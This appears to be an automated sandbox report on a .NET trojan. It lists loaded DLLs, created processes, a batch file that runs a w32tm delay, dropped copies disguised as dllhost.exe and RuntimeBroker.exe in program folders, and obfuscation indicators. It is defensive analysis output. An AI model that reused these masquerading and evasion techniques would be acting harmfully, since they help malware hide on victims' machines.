                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeSection loaded: dlnashext.dllJump to behavior
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeSection loaded: wpdshext.dllJump to behavior
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeSection loaded: edputil.dllJump to behavior
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeSection loaded: appresolver.dllJump to behavior
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeSection loaded: bcp47langs.dllJump to behavior
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeSection loaded: slc.dllJump to behavior
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeSection loaded: sppc.dllJump to behavior
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                              Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                              Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
                              Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
                              Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dllJump to behavior
                              Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dllJump to behavior
                              Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dllJump to behavior
                              Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dllJump to behavior
                              Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeSection loaded: version.dllJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeSection loaded: rasapi32.dllJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeSection loaded: rasman.dllJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeSection loaded: rtutils.dllJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeSection loaded: winhttp.dllJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeSection loaded: dhcpcsvc6.dllJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeSection loaded: dhcpcsvc.dllJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeSection loaded: dnsapi.dllJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeSection loaded: winmm.dllJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeSection loaded: winmmbase.dllJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeSection loaded: mmdevapi.dllJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeSection loaded: devobj.dllJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeSection loaded: ksuser.dllJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeSection loaded: avrt.dllJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeSection loaded: audioses.dllJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeSection loaded: powrprof.dllJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeSection loaded: umpdc.dllJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeSection loaded: msacm32.dllJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeSection loaded: midimap.dllJump to behavior
                              Source: 4Osfx7gnSx.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                              Source: 4Osfx7gnSx.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: RuntimeBroker.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: dllhost.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: izvoheVaDbpPfPMLrEwQFH.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: Idle.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: 4Osfx7gnSx.exe, WwGe4ifcPPb7HU3ojZ3.csCryptographic APIs: 'CreateDecryptor'
                              Source: 4Osfx7gnSx.exe, WwGe4ifcPPb7HU3ojZ3.csCryptographic APIs: 'CreateDecryptor'
                              Source: 4Osfx7gnSx.exe, WwGe4ifcPPb7HU3ojZ3.csCryptographic APIs: 'CreateDecryptor'
                              Source: 4Osfx7gnSx.exe, WwGe4ifcPPb7HU3ojZ3.csCryptographic APIs: 'CreateDecryptor'
                              Source: classification engineClassification label: mal100.troj.evad.winEXE@10/16@0/1
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeFile created: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\dllhost.exeJump to behavior
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\4Osfx7gnSx.exe.logJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeMutant created: \Sessions\1\BaseNamedObjects\Local\f5385fc79e9021f657c18cf7058843ccdc6f204c6038281856b86882f1fd12ee
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeMutant created: NULL
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6488:120:WilError_03
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeFile created: C:\Users\user\AppData\Local\Temp\bGXwwcwHIxJump to behavior
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ZdeZCxRlxT.bat"
                              Source: 4Osfx7gnSx.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: 4Osfx7gnSx.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeFile read: C:\Users\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                              Source: 4Osfx7gnSx.exeReversingLabs: Detection: 68%
                              Source: 4Osfx7gnSx.exeVirustotal: Detection: 58%
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeFile read: C:\Users\user\Desktop\4Osfx7gnSx.exeJump to behavior
                              Source: unknownProcess created: C:\Users\user\Desktop\4Osfx7gnSx.exe C:\Users\user\Desktop\4Osfx7gnSx.exe
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ZdeZCxRlxT.bat"
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe "C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe"
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ZdeZCxRlxT.bat" Jump to behavior
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 Jump to behavior
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe "C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe" Jump to behavior
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{289AF617-1CC3-42A6-926C-E6A863F0E3BA}\InProcServer32Jump to behavior
                              Source: Window RecorderWindow detected: More than 3 window changes detected
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeDirectory created: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\dllhost.exeJump to behavior
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeDirectory created: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\5940a34987c991Jump to behavior
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeDirectory created: C:\Program Files\Mozilla Firefox\fonts\RuntimeBroker.exeJump to behavior
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeDirectory created: C:\Program Files\Mozilla Firefox\fonts\9e8d7a4ca61bd9Jump to behavior
                              Source: 4Osfx7gnSx.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                              Source: 4Osfx7gnSx.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                              Source: 4Osfx7gnSx.exeStatic file information: File size 1649152 > 1048576
                              Source: 4Osfx7gnSx.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x192200
                              Source: 4Osfx7gnSx.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                              Data Obfuscation

                              barindex
                              .NET source code contains method to dynamically call methods (often used by packers)
                              Source: 4Osfx7gnSx.exe, WwGe4ifcPPb7HU3ojZ3.cs.Net Code: Type.GetTypeFromHandle(HQBXVmsmuarlqIodyrE.vPhUiYtNqHV(16777425)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(HQBXVmsmuarlqIodyrE.vPhUiYtNqHV(16777246)),Type.GetTypeFromHandle(HQBXVmsmuarlqIodyrE.vPhUiYtNqHV(16777260))})
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeCode function: 0_2_00007FF848F200BD pushad ; iretd 0_2_00007FF848F200C1
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeCode function: 6_2_00007FF848F100BD pushad ; iretd 6_2_00007FF848F100C1
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeCode function: 6_2_00007FF8490D3E1D push E95F3305h; ret 6_2_00007FF8490D3E99
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeCode function: 6_2_00007FF8490D4665 push edi; retf 6_2_00007FF8490D4667
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeCode function: 6_2_00007FF8490E589D push cs; retf 6_2_00007FF8490E597F
                              Source: 4Osfx7gnSx.exeStatic PE information: section name: .text entropy: 7.425665296125914
                              Source: RuntimeBroker.exe.0.drStatic PE information: section name: .text entropy: 7.425665296125914
                              Source: dllhost.exe.0.drStatic PE information: section name: .text entropy: 7.425665296125914
                              Source: izvoheVaDbpPfPMLrEwQFH.exe.0.drStatic PE information: section name: .text entropy: 7.425665296125914
                              Source: Idle.exe.0.drStatic PE information: section name: .text entropy: 7.425665296125914
                              Source: 4Osfx7gnSx.exe, YIvZxNJyP2PxhmAF8aK.csHigh entropy of concatenated method names: 'xWAvAeA9CalxWImlimYh', 'GnUnmkA9kDiljDQgosih', 's6r8wUA94fI0SAv2admZ', 'ue3mUBA91AqL76KqtrNv', 'b5MT2rA9xpilZELcm7qo', 'hblwVjA9yGOG0svvo4wC', 'SpJsvtA9cihca8ZdcYif'
                              Source: 4Osfx7gnSx.exe, uthJ1nYpJDFncs8Jtwp.csHigh entropy of concatenated method names: 'IgVYiXjn9a', 'KknYHLeWVI', '_7Bm', 'f9kYIkos1m', 'hN2Y6qWpHQ', 'K4dYVbUnYR', 'caxYD3jxFX', 'JRXLmBAhYMjiuaRinAVj', 'AAGcupAhe26j51TqtCH6', 'MfKCm7AhZW3yykGgJOkK'
                              Source: 4Osfx7gnSx.exe, x3bdZR6hUN24G8ETIsS.csHigh entropy of concatenated method names: 'ENk6QMne4O', 'pnm6dE2oou', 'DOD6fF5hCw', 'rJ96KXHQ7g', 'ips6snesNy', 'K3k6XNU1iN', 'FgW6zTdjkK', 'IDTOJ0AOCqnfpXcRwtoJ', 'ykJxNCAOP8YN8Rl4NxYK', 'WyTUysAOkkSVLZqm48IQ'
                              Source: 4Osfx7gnSx.exe, GCEE1jmU1GU3Bve1H2R.csHigh entropy of concatenated method names: 'xBImm0XqkS', 'FNsm7HVodW', 'BePmaSaDBE', 'EYrmixOlKy', 'BYVmHZcrZV', 'srjmIa9EoK', 'bU1m6gSsLS', 'DYrmVyHJKe', 'l8PmDZPU8W', 'obumurxOtN'
                              Source: 4Osfx7gnSx.exe, kJ3eRfIMC8DoVD3PdoC.csHigh entropy of concatenated method names: 'TZ1IqSbjnE', 'yN7IhdGIxG', 'ytdI82IJNI', 'UTpGxVArChhHkt4XAT3X', 'nKMhtbArkG1qlSw9GYHi', 'dmJ6TQAr46Hr9EqsrY1P', 'judBgMArPmtFb6wmfiTB', 's2SIOUnF0W', 'o4dIb7m9oX', 'pKKIE4QTbR'
                              Source: 4Osfx7gnSx.exe, xYGT4kVzZtSbYcsKvGh.csHigh entropy of concatenated method names: 'RBsDHpCrYo', 'nQrrVvAbELjp2oO242Mt', 'ySLQQXAbJoSdNFX0srUj', 'KGLipCAbwyAYwS02QXr7', 'B7RZUuAboJTFDeytsDTn', 'eq7', 'd65', 'zKmAacGUnNf', 'PycAa1VMj6x', 'MLUA63l6dn8'
                              Source: 4Osfx7gnSx.exe, F4py9W3PWY3xZw53WxK.csHigh entropy of concatenated method names: '_57l', '_9m5', 't8K', 'k49', 'p65', '_3B1', '_4Pp', '_3M7', '_7b3', 'fAL'
                              Source: 4Osfx7gnSx.exe, EuIv0bU6LWIo3wFT5pF.csHigh entropy of concatenated method names: 'hJgUDORaXq', 'JZhUuisy1s', 'yFbU2BUhLk', 'sN9WXXAehYWdk6xcox0X', 'SSJdjKAejbXbN1h0edPn', 'gXMdwkAeqyxGD83T6Teq', 'VYf1okAe8ijYT8vabc4H', 'xqpwN0Aet4eCcfLTGZFU', 'jeEmTBAeNJTDt1mhvOkv', 'HYuQWQAevOKTyKGbsg1G'
                              Source: 4Osfx7gnSx.exe, y4SnIKU0pDCRVoqFoDW.csHigh entropy of concatenated method names: 'KthUs1GKPw', 'qRGUXa6Qki', 'fXYUzWMsiF', 'ijV0KCAZEL07tlVRIBA4', 'XKeWUmAZOfymZE2bbpyl', 'CTAGBUAZbXFlcD1Xa3To', 'kyrpiy0nCh', 'opDwTKAZLsD9a4WgmsPN', 'HFJk6YAZwxkTMD3pTbpI', 'x6XXPFAZoP7X2UQqJbPO'
                              Source: 4Osfx7gnSx.exe, oJRmiilvsAaGl8wkZeE.csHigh entropy of concatenated method names: 'TnBlQ0J4xl', 'sacldexvjC', 'sPUlfyhPEC', 'hrylKbZXyW', 'rnAlssXQG4', 'QfdRcOAwbJeS8DAT96xY', 'RlgqmqAwrkl4sHUqfCR7', 'hLM1qTAwOjLcghk5ZLsS', 'Xj15CVAwEAa2XNHhOMkd', 'hSWpuhAwJRrH5Zh8KOjG'
                              Source: 4Osfx7gnSx.exe, lCH2l1DB2GFXrLECweY.csHigh entropy of concatenated method names: '_34V', 'y7u', 'MMMA6JQcUdI', 'FvUDqb0gM0', 'gt1', 'RpJeMhAEeRNtH5FEQjnL', 'DCIx8JAECusKIsT8XjHQ', 'Lxj0tJAEPuN5wJom32HG', 'K2QlqrAEZAkMadXccQ7d', 'KNxHSqAEYhgJdl4vPGxO'
                              Source: 4Osfx7gnSx.exe, cGZWS5gzcbfpLaXDe33.csHigh entropy of concatenated method names: '_26K', '_1U7', '_5gR', '_58D', 'H8v', 'iroTAagqGe', 'm4RTUCGEdi', 'gY2', 'rV4', '_28E'
                              Source: 4Osfx7gnSx.exe, SqXpU9m9wseTF8OJP2X.csHigh entropy of concatenated method names: 'ihNS8mA0bBKQJvFKewf5', 'Knr1f4A0rQyqPM4i3OUG', 'FdhrZCA0OmSTlgQLEpLZ', 'QbS9msA0Eh2WHAJqVSEW', 'XT4x4aQAEm', 'VW5gLXA0wcmmgQWBakjV', 'C3FuXNA0oFYpt88fXxQ3', 'f0CZMTA0LjMbkKNl932B', 'VAqxevDWxh', 'zLZGjAA00Uhhg6o4AlW3'
                              Source: 4Osfx7gnSx.exe, mLv8jwtfF0vbekSQLdI.csHigh entropy of concatenated method names: 'qOyN2BQrAu', 'giFImKAdADN5IvhjHwxW', 'LDlIVBAQzXqRD9aHiMqd', 'FLWYAeAdGxiT56PiVfQJ', 'VyUAPqAdUvmGvUasJJdZ', 'CPX', 'h7V', 'G6s', '_2r8', 'hdKAHrDT5rR'
                              Source: 4Osfx7gnSx.exe, iumbDKs14y6jUkVn78G.csHigh entropy of concatenated method names: 'O3VsMcJXNL', 'Oo4sr4DQeP', 'JibsO51Vv5', 'Q1Wsb0bpgv', 'fOKsE0R1o3', 'GE3sJoY6en', 'xv2swm10db', 'DLMsoI34LO', 'Jx4sLoPr7Q', 'YJ6s5jya6t'
                              Source: 4Osfx7gnSx.exe, muYNRH8N9GBtYrDHJsI.csHigh entropy of concatenated method names: 'NsU89PVZEn', 'JIC8Q3g4SW', 'mI78dCTI63', 'oes8fgd8Ns', 'TRq8KMUumb', 'hno8spsMS6', 'Ufo8XoQHrY', 'O1N8zsP1h1', 'N40tGRnkPs', 'zCxtAK0gWF'
                              Source: 4Osfx7gnSx.exe, zlC7UguYFcPWWtFVQFt.csHigh entropy of concatenated method names: 'ReZW7jCVYT', 'dA98AGAJjh21oGM1wldy', 'x30pjmAJ0217OCZcep9q', 'X55sCTAJBcdIvwcq267b', 'uCsuSuotIg', 'tnruMsmT9c', 'jIDur6UhCS', 'pyguO7mApE', 'x1RubhhxMX', 'moPuEho1DP'
                              Source: 4Osfx7gnSx.exe, Fvr3FKELp9WlwZ5Wmrw.csHigh entropy of concatenated method names: 'cnJE067DWQ', 'rdXEBGaxHq', 'jn3Ejss4S7', 'X2sEqMSaG8', 'eNSEhfOASb', 'uGuE8ft5UX', 'QHuEtDDlQs', 'iiyEN236Dj', 'GxBEvRqOqq', 'dpdE9g4wms'
                              Source: 4Osfx7gnSx.exe, E5vRjRvWQXPujQaUXQo.csHigh entropy of concatenated method names: 'NV3AHE5FPq2', 'VpmAHJPOkPT', 'BTpAHwp39Dv', 'kOi7k8Af14j7hu0mmKkj', 'GkF75mAfx28h395BYU4h', 'RmPxUHAfng209cbvTYpm', 'O42A6q2lV4K', 'VpmAHJPOkPT', 'hTpdnbAfPJ91i73JsBRh', 'khtZMhAf4g7oTUMoJkyg'
                              Source: 4Osfx7gnSx.exe, AEPfu4MxWnfMYI6vPMN.csHigh entropy of concatenated method names: 'KHlrg26rcn', 'XMFF6wAt5fCvM4gBcJLG', 'QqPAUgAtoX0eD1VU6Ccy', 'ztpk5SAtLlLfWpUOrHvR', 'KMfjHBAt0r7Z3a7oF99r', 'i5X', 'IpvMkcCsJW', 'W93', 'L67', '_2PR'
                              Source: 4Osfx7gnSx.exe, eHcv6BZcCwTZ4dg4J2n.csHigh entropy of concatenated method names: 'cPqZx3SWF9', 'PXsZnvFIeg', 'M62', '_1Xu', 'LuR', '_4p3', 'HVh', 'TZpZkYSmd0', '_96S', '_9s5'
                              Source: 4Osfx7gnSx.exe, J5HBhXpOqxmFjrUOCYA.csHigh entropy of concatenated method names: 'pjfpECW1wg', 'DfipJDlcTl', 'Whipw9suB6', 'ESNpo9qxmn', 'FEDpLkOkSx', 'IIwp5qWRFa', 'eUJp0JjuE8', 'wx5pBa73Vd', 'CvtpjgCgvE', 'KXkpqFj8Sl'
                              Source: 4Osfx7gnSx.exe, ka5MwRixL9AVVXtHp2o.csHigh entropy of concatenated method names: 'xLwiOXXBqH', 'hPoibU3BQm', 'ClDymCASkDbESP8FYnDe', 'NeICMlASxJIoH2KLy5OY', 'ivwGVKASnpOSv2Pgl7rh', 'aUU9dpAS4EDK4K0Gftoy', 'isBikjdc4w', 'b6Bi4H8L7N', 'KGJiCUhOOO', 'UEjiPTyJBS'
                              Source: 4Osfx7gnSx.exe, NcvRgGHIhRMF1ond05k.csHigh entropy of concatenated method names: 'JuZHyo6wvV', 'b48HcoYgQG', 'xW6BedAMaWPrQtI7aWIp', 'bMpJ2rAMUpolTIclsVR0', 'L79jlrAMpYpEFbLSlkri', 'jJvJpgAMiOV4iJ8Z3vwu', 'P3nHmHMP16', 'nIhHFsK93V', 'zcoTrSASz3sXPUjQT3vj', 'BIbvDxASskSlhdMKp0M1'
                              Source: 4Osfx7gnSx.exe, K6mHfLs04oTPi9YMbur.csHigh entropy of concatenated method names: 'KS3AHhQ7UFN', 'achAH8xsIMk', 'GCvAHt23b34', 'Mu9AHNhQ4LF', 'hVuAHvq9Nn5', 'T30AH9ayHPt', 'a6iAHQ8jE8l', 'A1PXVx9xFI', 'Ve4AHdFP1Ks', 'W7BAHfflk2C'
                              Source: 4Osfx7gnSx.exe, SJAXIitNC9Sr8XUkA5p.csHigh entropy of concatenated method names: 'IjMA6jeXXhq', 't3dt9N8tQ5', 'QB4tQS3Ovd', 'zBotdtppZm', 'daDoFIAQ1rqroo5FcKNF', 'AigucmAQxZV6YhIdVnmu', 'FdYE5XAQnatlJPorUveA', 'vjseiuAQkbBjQFTNd22X', 'qLQaSOAQ4KypAglwifEi', 'kouRnFAQCODxn2Eu5NZw'
                              Source: 4Osfx7gnSx.exe, p7l1D9E2e0mKvglM9XU.csHigh entropy of concatenated method names: '_9b1', 'yj8Elk60tZ', '_4Xs', '_885', '_74i', 'r8N', '_3Lk', 'Htz', 'J52', 'BV1'
                              Source: 4Osfx7gnSx.exe, WdMiWgRXMHHKNo4Xfbl.csHigh entropy of concatenated method names: 'WGxgGTa4FB', 'llkgAv78hy', 'WZfgUfUnLf', 'n3ggpmXw3u', 'pnJgasgLQn', 'mjdhTOAoHNZQxRp6LiuT', 'JCHRcsAoajZCyee4cvuT', 'rShyryAoi3QOYG5TqZ0d', 'JRPL21AoIPiH3XZjifRG', 'T8MhR6Ao6ffyCQhQZvth'
                              Source: 4Osfx7gnSx.exe, eD5BGiIQaDDj5sh4Sqc.csHigh entropy of concatenated method names: '_5Z7', '_58k', '_4x4', 'bU6', '_3t4', 'a5C', 'wwr3JuArr8YZk6ku3CAp', 'bd3CsoArOSK1XUINbnir', 'oWBpyvArbLgaLoq4jBHY', 'Kn4EuxArEoP1w2G6L1qs'
                              Source: 4Osfx7gnSx.exe, hiDrrWW0qnnw4ffAYCB.csHigh entropy of concatenated method names: 'bcvWjOZenF', 'tLIWq3xcW3', 'oeUWhWMZdd', 'QWEW8fh9qI', 'T7pWtKnUkl', 'v8yIsiAwUsMeNPHgPKW5', 'PW5AqVAwGsp1RfoqZ9oC', 'sIE5xYAwAMMhB41Ef39U', 'mH3sQSAwpEKe6m68YALo', 'bdDSNNAwaEqnst8YmRQV'
                              Source: 4Osfx7gnSx.exe, BA9IGGAdmklKm4m0t8O.csHigh entropy of concatenated method names: 'io8', 'V29', 'j67', '_2Q4', 'pi9', 'giXA672UxNI', 'OaCAptYfiN1', 'dGZCuUAePjw2uXb6m6Bv', 'ueBjGqAeeGxMWgQ2tIYk', 'qngvSWAeZm2FWspdB3Yh'
